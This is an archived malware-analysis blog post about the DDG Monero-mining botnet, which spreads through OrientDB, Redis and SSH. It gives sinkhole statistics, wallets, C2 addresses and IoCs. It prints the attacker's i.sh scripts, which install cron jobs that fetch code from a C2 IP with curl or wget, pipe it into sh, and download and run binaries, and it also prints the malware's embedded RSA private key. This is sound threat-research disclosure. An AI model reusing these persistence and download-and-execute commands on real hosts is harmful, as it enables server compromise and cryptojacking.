{
	"id": "9b94baa8-f84f-4aad-bd4d-e340fcb3de2e",
	"created_at": "2026-04-06T00:08:20.701442Z",
	"updated_at": "2026-04-10T13:12:56.583508Z",
	"deleted_at": null,
	"sha1_hash": "dd032ccc8d47cdb809068149057c9800187fc76a",
	"title": "DDG: A Mining Botnet Aiming at Database Servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 762904,
	"plain_text": "DDG: A Mining Botnet Aiming at Database Servers\r\nBy JiaYu\r\nPublished: 2018-02-01 · Archived: 2026-04-05 16:16:10 UTC\r\nStarting 2017-10-25, we noticed there was a large-scale ongoing scan targeting OrientDB databases. Further analysis\r\nfound that this is a long-running botnet whose main goal is to mine the Monero cryptocurrency. We name it\r\nDDG.Mining.Botnet after its core function module name DDG.\r\nCurrently we are able to confirm that the botnet has mined more than 3,395 Monero coins, equivalent to USD 925,383 at\r\ncurrent prices. In addition, there is another 2,428 XMR (equivalent to USD 661,759) we have yet to fully confirm due to\r\nthe mining pool's payment record issue. This makes DDG by far the second largest Monero-related botnet we have seen, just\r\nbehind the MyKings Botnet we reported earlier.\r\nDDG code appeared at least as early as late 2016 and was continuously updated throughout 2017.\r\nDDG uses a C2 and HUB layout to communicate with its clients. The HUB is a set of IPs and domain names that are used to\r\nprovide the Miner program for the compromised clients to download.\r\nIt is worth noting that we were able to successfully register and sinkhole two domain names used by its v2011 version, thus\r\nwe were able to get a good understanding of the size of the entire DDG botnet based on sinkhole data.\r\nDDG Mining Botnet Total Incoming\r\nDDG uses the following mining pool:\r\nhttps://monero.crypto-pool.fr/\r\nThree wallet addresses have been used, as follows:\r\nWallet #1\r\n4AxgKJtp8TTN9Ab9JLnvg7BxZ7Hnw4hxigg35LrDVXbKdUxmcsXPEKU3SEUQxeSFV3bo2zCD7AiCzP2kQ6VHouK3Kwn\r\nWallet #2\r\n45XyPEnJ6c2STDwe8GXYqZTccoHmscoNSDiTisvzzekwDSXyahCUmh19Mh2ewv1XDk3xPj3mN2CoDRjd3vLi1hrz6imWB\r\nWallet #3\r\n44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxu\r\nAmong them, Wallet#3 was the first wallet address to be used, most active between 2017-02 and 2017-03; it was then\r\nfollowed by Wallet#1, used for most of 2017; Wallet#2 is a recently active one, first seen on 2018-01-03.\r\nThe pool allows us to check the payment record of the wallets. The income of all three wallets is shown in the following\r\ntable. The total income is Monero 3,395 or 5,760. These tokens are worth USD 925,383 or 1,569,963 today. Note: There is\r\nan issue for the second wallet, where \"Total Paid\" is not consistent with the sum of all transactions' amounts. We cannot\r\nconfirm which number is more accurate, so we show both numbers here.\r\nhttps://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/\r\nPage 1 of 14\n\nDDG Mining Botnet Workflow\r\nBy analyzing the sample and its behavior, we can characterize the DDG Mining Botnet attack as follows:\r\nIn the picture above, the DDG Mining Botnet attack process can be divided into several stages:\r\nInitial Scanning: The attacker (ss2480.2) exploits the known RCE vulnerability of the OrientDB database and drops\r\nthe attack payload\r\nStage 1: Attackers modify local Crontab scheduled tasks, download and execute i.sh (hxxp://218.248.40.228:8443/i.sh)\r\non the primary server and keep it synchronized every 5 minutes\r\nStage 2: DDG traverses the built-in file hub_iplist.txt, checks the connectivity of every single entry and tries to\r\ndownload the corresponding Miner program wnTKYg from the first one that can be successfully connected (wnTKYg.noaes if\r\nthe native CPU does not support AES-NI)\r\nMining Stage: The Miner program uses the computing resources of the compromised host to mine\r\nfor the attacker's wallet.\r\nThe HUB used in the second phase is a very interesting design. The attacker goes over all IPs and domain names written in\r\nthe HUB file to download the mining program, so as to avoid the possible blocking caused by using a single download\r\nserver. We observe that DDG operators update the IPs and domain names of these HUBs from time to time, and most of these\r\nIPs and domains are hacked boxes. 
See the entire HUB list at the end.\r\nIn v2011, somehow two domain names out of three on the list were left unregistered, so we went ahead and registered them,\r\nas follows.\r\ndefaultnotepad567[.]com\r\nunains1748[.]com unregistered\r\n5dba35bsmrd[.]com unregistered\r\nBelow we will introduce the DDG botnet C2s, HUB, and Bot respectively.\r\nThe C2s\r\nThe DDG botnet uses the following C2s to maintain control of the device:\r\n202.181.169.98:8443/i.sh\r\n218.248.40.228:8443/i.sh\r\nThe first C2 was only used by this botnet briefly, and the second C2 has been pretty much the only active C2 for the last two\r\nyears.\r\nThe HUB and Our Sinkhole\r\nThe DDG botnet uses hub_ip:8443/wnTKYg to provide the miner program. The detailed list of the two versions of HUB we\r\nmonitored is given in the IoC section at the end of this article. The country distribution is shown in the following table. Most\r\nof the victims can be seen in China.\r\nAs we mentioned before, the DDG bot will go over and check the connectivity of every single one of the IPs and domain names on\r\nthe hub list, which means we were able to get a very accurate infected client list by sinkholing the above two domains.\r\nThe DDG operators noticed this after about 20 days and subsequently released an updated version of DDG code that\r\nreplaced all IPs and domain names, including our sinkholed domains. 
But the time was long enough for us to get a good\r\nmeasurement of this botnet.\r\nUse Sinkhole Data to Measure DDG Mining Botnets\r\nFrom the sinkhole data, we recorded a total of 4,391 IP addresses of victims from all countries, with the most\r\nprominent victims being China (73%) and the United States (11%):\r\nAnd the following diagram shows the overall trend of the victims' DNS requests for the above two domains.\r\nTo avoid abuse, the list of all victim IPs is not made public.\r\nA DNSMon Perspective\r\nOur DNSMon is also aware of these three domain names; the traffic access patterns of these 3 domains match very well, as\r\ncan be seen from the first diagram:\r\nAnd the second diagram shows that these 3 domains have very strong correlations.\r\nDDG Mining Botnet Attack Process Breakdown\r\nInitial Scanning\r\nThe scanning and intrusion phase of the DDG Mining Botnet is done by sample ss2480.2. ss2480.2 scans port 2480 and\r\nthen uses the OrientDB RCE vulnerability CVE-2017-11467 to carry out the intrusion.\r\nss2480.2 will first scan the internal network, and then scan the public network segment. The internal target IP ranges are:\r\n10.Y.x.x/16 (Y is the second octet of the current intranet IP address)\r\n172.16.x.x/16\r\n192.168.x.x/16\r\nAfter the internal network scan, ss2480.2 visits hxxp://v4.ident.me to get the public IP address of the current host (WAN_IP),\r\nthen uses WAN_IP/8 to generate the public target IP ranges. 
All the reserved address ranges are filtered out:\r\nStage 1\r\nHere is the main configuration URL of DDG; the IP 218.248.40.228 is located in India, AS9829:\r\nhxxp://218.248.40.228:8443/i.sh\r\nThis i.sh has changed many times, but the content is more or less the same. Below is an early version, with the following main\r\nfunctions:\r\nSynchronize the local Crontab with i.sh from the C2 server\r\nDownload and execute the DDG sample from the C2 server\r\nCheck for and kill old versions of the local DDG process\r\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin\r\necho \"*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh\" \u003e /var/spool/cron/root\r\nmkdir -p /var/spool/cron/crontabs\r\necho \"*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh?6 | sh\" \u003e /var/spool/cron/crontabs/root\r\nif [ ! -f \"/tmp/ddg.2011\" ]; then\r\n curl -fsSL http://218.248.40.228:8443/2011/ddg.$(uname -m) -o /tmp/ddg.2011\r\nfi\r\nchmod +x /tmp/ddg.2011 \u0026\u0026 /tmp/ddg.2011\r\n#if [ ! -f \"/tmp/ss2480.2\" ]; then\r\n #curl -fsSL http://218.248.40.228:8443/ss2480.2 -o /tmp/ss2480.2\r\n#fi\r\n#chmod +x /tmp/ss2480.2 \u0026\u0026 /tmp/ss2480.2\r\nps auxf | grep -v grep | grep ss2480.1 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ss22522.1 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ss22522.2 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.1010 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.1021 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2001 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2003 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2004 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2005 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2011 || rm -rf /tmp/ddg.2011\r\nThe i.sh script gives the attacker very flexible control to deliver any malicious software to the compromised host. And we did\r\nsee this file change from time to time to serve new Trojan files or to deliver malware that incorporates new attacks. For\r\nexample:\r\nDDG Samples: the ddg.$(uname -m) series. This is the long-running payload; we have seen three versions, V2011, V2020\r\nand V2021\r\nss22522 Samples: Only worked for a short period, against the Struts2 vulnerability S2-052\r\nss2480 Samples: Also only for a short period, against the OrientDB RCE. This is the very sample that exposed DDG to us\r\nBy the way, there is an issue in the early version of i.sh, where an \"xargs\" is missing just ahead of the 'kill' command, so the older\r\nprocess will not get killed as intended. 
This issue is fixed in later versions.\r\nOn 2018-01-03, the attacker pushed out the newest version of i.sh (v2021.2), adding another mining process, imWBR1, which\r\nuses the second XMR wallet listed earlier:\r\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin\r\necho \"*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh\" \u003e /var/spool/cron/root\r\necho \"*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh\" \u003e\u003e /var/spool/cron/root\r\nmkdir -p /var/spool/cron/crontabs\r\necho \"*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh\" \u003e /var/spool/cron/crontabs/root\r\necho \"*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh\" \u003e\u003e /var/spool/cron/crontabs/root\r\nif [ ! -f \"/tmp/ddg.2021\" ]; then\r\n curl -fsSL http://218.248.40.228:8443/2021/ddg.$(uname -m) -o /tmp/ddg.2021\r\nfi\r\nif [ ! -f \"/tmp/ddg.2021\" ]; then\r\n wget -q http://218.248.40.228:8443/2021/ddg.$(uname -m) -O /tmp/ddg.2021\r\nfi\r\nchmod +x /tmp/ddg.2021 \u0026\u0026 /tmp/ddg.2021\r\nif [ ! -f \"/tmp/imWBR1\" ]; then\r\n curl -fsSL http://218.248.40.228:8443/imWBR1 -o /tmp/imWBR1 --compressed\r\nfi\r\nps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill\r\nps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill\r\n#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill\r\n#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill\r\nStage 2\r\nAt this phase, DDG tests all the hosts in hub_iplist.txt, and on success visits\r\nhxxp://hub_ip:8443/wnTKYg to download and execute the corresponding Miner program wnTKYg (if the native CPU\r\ndoes not support AES-NI, it will download wnTKYg.noaes).\r\nAll the ddg.xxx and ss2480.xxx samples were written in Golang. DDG communicates with the HUB using a third-party Golang stream\r\nmultiplexing library, Smux. The default Smux configuration is used.\r\nSo after DDG downloads the Miner from the HUB and starts its KeepAlive, it sends 2 packets to the connected HUB IP every\r\n10s:\r\nThe Built-in Hub_iplist.txt\r\nThe original DDG sample download URL is hxxp://218.248.40.228:8443/2011/ddg.$(uname -m), as written in i.sh. There\r\nare 158 hub_ip:8443 entries and 3 hub_domain:8443 entries listed in the hub_iplist, two of which were unregistered and were then registered by\r\nus.\r\nOn 2017-11-10 we found that the contents of the i.sh file had changed; the ddg sample download link had changed to\r\nhxxp://218.248.40.228:8443/2020/ddg.$(uname -m). 
The attacker replaced all HUB IPs and domain names, including ours.\r\nThe latest contents of hub_iplist.txt can be seen at the bottom of this blog, ip_hublist (v2020 ~ v2021).\r\nDDG Mining Botnet Also Targeted Redis Database and SSH Service\r\nThe above analysis focuses on the OrientDB exploit (ss2480 series).\r\nIn fact, the DDG samples also target SSH and Redis services, which are the other two major methods used by DDG to\r\ncompromise vulnerable hosts. Some of the related functions and the password dictionary are shown in the following two\r\nfigures:\r\nThe victim is also implanted with X509 key files. Three key files are built into the sample, as follows (details at the end\r\nof the article):\r\n1. slave.pem\r\n2. ca.pem\r\n3. slave.key\r\nLooking at historical data, we can also see the i.sh host 218.248.40.228 scanning the Redis database early on. A Google\r\nsearch turned up some posts complaining that their server was infested with the ddg botnet. The following diagram shows the ports\r\nthat were scanned by 218.248.40.228 between 2017-09-27 20:00:00 ~ 2017-10-25 11:00:00. 
Ports\r\n6379, 7379 and 2480 represent Redis, Redis (replicas) and OrientDB:\r\nOne more thing\r\nStarting from 2018-01-25 at 21:00 (GMT+8), we saw another update of this botnet, with the link\r\nhxxp://218.248.40.228:8443/2011/ddg.x86_64, and this time it delivers a Mirai family sample.\r\nFamily : mirai\r\nC2 : linuxuclib.com:8080\r\nC2 : jbeupq84v7.2y.net, no IP address associated yet\r\nMD5 : cbc4ba55c5ac0a12150f70585af396dc\r\nIoC\r\nC2:\r\n202.181.169.98:8443\r\n218.248.40.228:8443\r\nlinuxuclib.com:8080\r\njbeupq84v7.2y.net\r\nSamples' MD5:\r\nb1201bf62f3ca42c87515778f70fd789 ddg.i686 --\u003e v2011\r\n7705b32ac794839852844bb99d494797 ddg.x86_64 --\u003e v2011\r\n1970269321e3d30d6b130af390f2ea5c ddg.i686 --\u003e v2020\r\n5751440a2b3ce1481cf1464c8ac37cbe ddg.x86_64 --\u003e v2020\r\nf52f771c5b40a60ce344d39298866203 ddg.i686 --\u003e v2021\r\n3ea75a85bab6493db39b1f65940cc438 ddg.x86_64 --\u003e v2021\r\nb0c6cefa1a339437c75c6b09cefeb2e8 ss2480.1\r\n8c31b6379c1c37cf747fa19b63dd84a1 ss2480.2\r\n4fc28b8727da0bcd083a7ac3f70933fa ss22522.2\r\nd3b1700a413924743caab1460129396b wnTKYg\r\n8eaf1f18c006e6ecacfb1adb0ef7faee wnTKYg.noaes\r\n9ebf7fc39efe7c553989d54965ebb468 imWBR1\r\nSample Downloading URL\r\nhxxp://218.248.40.228:8443/2011/ddg.i686\r\nhxxp://218.248.40.228:8443/2011/ddg.x86_64\r\nhxxp://218.248.40.228:8443/2020/ddg.i686\r\nhxxp://218.248.40.228:8443/2020/ddg.x86_64\r\nhxxp://218.248.40.228:8443/2021/ddg.i686\r\nhxxp://218.248.40.228:8443/2021/ddg.x86_64\r\nhxxp://218.248.40.228:8443/i.sh\r\nhxxp://218.248.40.228:8443/ss22522.2\r\nhxxp://218.248.40.228:8443/ss2480.1\r\nhxxp://218.248.40.228:8443/ss2480.2\r\nhxxp://218.248.40.228:8443/wnTKYg\r\nhxxp://202.181.169.98:8443/2011/ddg.i686\r\nhxxp://202.181.169.98:8443/2011/ddg.x86_64\r\nhxxp://202.181.169.98:8443/i.sh\r\nhxxp://202.181.169.98:8443/ss22522.2\r\nhxxp://202.181.169.98:8443/ss2480.1\r\nhxxp://202.181.169.98:8443/ss2480.2\r\nhxxp://202.181.169.98:8443/wnTKYg\r\nhxxp://218.248.40.228:8443/imWBR1\r\nip_hublist(v2011): ip_hublist__2011.txt\r\nip_hublist(v2020~v2021): ip_hublist__2020.txt\r\nThree Key files\r\nslave.pem\r\n-----BEGIN CERTIFICATE-----\r\nMIICozCCAYsCCQDFoT3X3cNwiDANBgkqhkiG9w0BAQsFADATMREwDwYDVQQDDAh3\r\nZS1hcy1jYTAeFw0xNzA3MTcwMTM2MjhaFw0yNzA3MTUwMTM2MjhaMBQxEjAQBgNV\r\nBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAN1w\r\n9s7u1BrQSxJEkqCkJLl+qnw4XPL+GgCimso6WWvie8gr3AFiSDUFMVsbOOlGVXJD\r\nCAaYStw6Wkn09cjAczNW9Ysq4EOurpGmCDdViftu+5zu2Zmz88p1/ta3BuytQlfE\r\nQll6IFjNLSPOAaIwaWcQFXN/OlCPJZ7wvdo5aXFgVkvFplXogQiFLdKn3PgtDiNy\r\nEZct1/GgkYkgMTiymGrhXyj6/Eca28IsTydwU5h2fkkAIwnYpyeeEdcxsLmmFmfE\r\nG5x1mNsmUPnvMU7/qULmchVJ16pne06rNREApbuhm/XrhaDjphK8CNbUDWNXCWIR\r\nSKUl5bMoq5XnrvKc98kCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAg/G9vqIRz4rC\r\nniH49gSwFzBhH9tCXyBtHj86WMb2hi9myzFGE4joMhWp7OK3lwWq18kbukPk0TBz\r\nN9Mxrvvr0REBMPa1Q7VAq5ouFHw4WcIyzi1Ksw0SmFjaRCGqJTWQnG8lz+aIN8NX\r\n/i1KBWPbrnZGFfLdcKUmKrIXt6I3S1kb3jhJvlTOTjfr/iPlAMjVE9+tdgmy0Bsh\r\nMon9ctFwFj0sLhkcuyXU33ItkX5am2qmG7ToCoUj855JEm06T6PSakRLvodAsZfp\r\nJmto1aFjT/7HS5ImcOrd1WWXU76cSZN5GENRcsIzmA3pq6dVKFfSwsAOMw5zQcTS\r\nuDpcOCRjJg==\r\n-----END CERTIFICATE-----\r\nca.pem\r\n-----BEGIN CERTIFICATE-----\r\nMIIC/DCCAeSgAwIBAgIJAK1DRcYUFowVMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV\r\nBAMMCHdlLWFzLWNhMB4XDTE3MDcxNzAxMzYyOFoXDTQ0MTIwMjAxMzYyOFowEzER\r\nMA8GA1UEAwwId2UtYXMtY2EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB\r\nAQCz6Iaprhnb68CEPCJzU1uCplIMQWuMtpuamV/M4T1G0A0qPHLsCPbnS+psuSwK\r\nTnp3XBDEdTbhm33/FfLXeEfEmJlVX4lJfPk7XPT/UwgJ1OgGVegxNndPd+FQf1oX\r\n5ePSEmGZQRy9gkRQtCpSmO11AO8bbZY+WhHzvb3VQmu6rBAVCnzhPmBBlXsoyJfI\r\noRVX5FEwCMZXuKHVd2N/Q8XBEFX6TGICEAwSCu69QYG7eFMleLgCxFRJ1xOXfPvD\r\nx++depGUDpR9PrsTQ6Oh3BIicuWHfj72tiooVW1mGG8yAqDfb1kBa5gq8jZM13Nx\r\ngK0aRbZiJFreFj8Ed05LlPdnAgMBAAGjUzBRMB0GA1UdDgQWBBRL9zCbPXsgyxFe\r\noZYZtZmjvAyqbDAfBgNVHSMEGDAWgBRL9zCbPXsgyxFeoZYZtZmjvAyqbDAPBgNV\r\nHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBFne95zt54uyUn2ZtdUUHH\r\nOh3ODsCx+hL4DWsyaVa1l9PTW1es58+VGPFr4JYKj5DDj1FebYW/k0DAt6G4ehVg\r\npfYW23lYbwfbs1gFKaUVX1gb0U0BsLlXGJ5dVlnY09Z3RGZ1nf0U6VgTbleDc/M6\r\nCax7dvyn2a+2BJLxl3QCUVye6PJw33Hjjl8xfMTEv3RKoxeYP0Prgrmmg/gmr7hs\r\ndoWJBMflCWmwZJKhtdYAKMkFnprNH4h8ryqsWeO928ZHbHbxej15Rv9BjXIg4XnF\r\ntEIvhZUJ3tj4OvK8X6hJf0ZsI/3H1ffvTHyIX4UnYgGqMFlHSBXMhOIiXed6+xsP\r\n-----END CERTIFICATE-----\r\nslave.key\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEowIBAAKCAQEA3XD2zu7UGtBLEkSSoKQkuX6qfDhc8v4aAKKayjpZa+J7yCvc\r\nAWJINQUxWxs46UZVckMIBphK3DpaSfT1yMBzM1b1iyrgQ66ukaYIN1WJ+277nO7Z\r\nmbPzynX+1rcG7K1CV8RCWXogWM0tI84BojBpZxAVc386UI8lnvC92jlpcWBWS8Wm\r\nVeiBCIUt0qfc+C0OI3IRly3X8aCRiSAxOLKYauFfKPr8RxrbwixPJ3BTmHZ+SQAj\r\nCdinJ54R1zGwuaYWZ8QbnHWY2yZQ+e8xTv+pQuZyFUnXqmd7Tqs1EQClu6Gb9euF\r\noOOmErwI1tQNY1cJYhFIpSXlsyirleeu8pz3yQIDAQABAoIBAQCTltbo1QVJWcqv\r\nQkT4DG7tsx6t7GMHEZUDF11Tq9Att6YIpDLeOUMnE27x6hLkZ5xLq6GNw7MhVUMY\r\nR8wJITum3C6LsugGNEbljGOtfbWZfz70Ob2OVAIIztwq/5H97PxqwsP2Hw+wIBAV\r\n7RfpoZqetnmVoRac2suYQ5xF9j3w8acpCZdU2jCvbMNADdOtCkXBXcD9nGU0d9dN\r\nZ+qajp7otDw1DbQ381x6YDEu0g9CJhXdVfqK0skOs9KTrATxLBw4u6UmIP7fNAoH\r\np9OXzp6gzzl4mLR05SWm1pcjuoqxL88wIPYtcfKo8Z4CxZhx2oPTiQ0JUiVHUvPh\r\nOZwu2GSBAoGBAPFscPODr2H4dFFKK6uYb2ZRY6WSOiL31o1LCZ3a4lDJS7fvncZK\r\nOiyG/RQIt0k68UQHNxte0VOHiaGqCaHlfikS/KN5WyQeaRmH+MKxp+atGvKXmURV\r\n+uWK37GCIDzqTDPtu9UiAxQOOJQZCvGh40lc35v2aJGKpkD4+IaEDpDXAoGBAOrP\r\nqpei2+DtwougNA9FTxS3Z34NCCIHT0rqoogZZirMy6M7LnUoWAgMIUjpENK7uxma\r\nnNEWagv5XrLmFbjC/UaTF5BR9CrX0orto2CNA2upN+7Y6wNnB1ed7sjLubDEPNXv\r\nJeZsoz4G7TDq9oXE54a8idFVePn8q1RdRvHOdYhfAoGAbMgqFO+vJPvonYBIMSec\r\neoQN3FsJKxx1ZnD7Qk+QTkqFfbnQY7qqf8nLWy2aOLsAX2DI6eJNe8/Eqj2N3Y8k\r\ny6ksgRR7hsjVHpXv9vpJ51z0mX7Jpsr/JFLw/HDfydLgxz1Ft4F91Zma0NB/5+TE\r\nHxhkAUiEUaAhzYDhquryDT0CgYAP0YOdiYQkh//mJhm7uaCVNbHMJRaaLEHkOyBN\r\n6OAgHAHP8kmz7M7ZY+/OGJ1ghPMay3arA0aLnfYKOUPXWZN0cK5Ss6KuTDHL2Cx8\r\ncaN8Wj8BYS2b4hH1jhcrAcZ1qRKsGttDxafNouvRstJ+uoAabJMgPhDTTnlASrRf\r\nz9fNIwKBgCM3UzxVsRyoYx7rpCQ7QSX6SHsM0cNjWDRw5aMziQmyI+sitwOPAVek\r\nO+XvIXIzdahNBhQQ0giFKWh/b7fq2aNB1J+5TtAcEFTFFk9LC3l/U7Mk0nhUsh6G\r\npEcsRlnc4GpFeelJtj/c1BHBbX7HSdB8osk3GDyUwX1KVlbxZ4dk\r\n-----END RSA PRIVATE KEY-----\r\nSource: https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/"
	],
	"report_names": [
		"ddg-a-mining-botnet-aiming-at-database-servers"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434100,
	"ts_updated_at": 1775826776,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dd032ccc8d47cdb809068149057c9800187fc76a.pdf",
		"text": "https://archive.orkl.eu/dd032ccc8d47cdb809068149057c9800187fc76a.txt",
		"img": "https://archive.orkl.eu/dd032ccc8d47cdb809068149057c9800187fc76a.jpg"
	}
}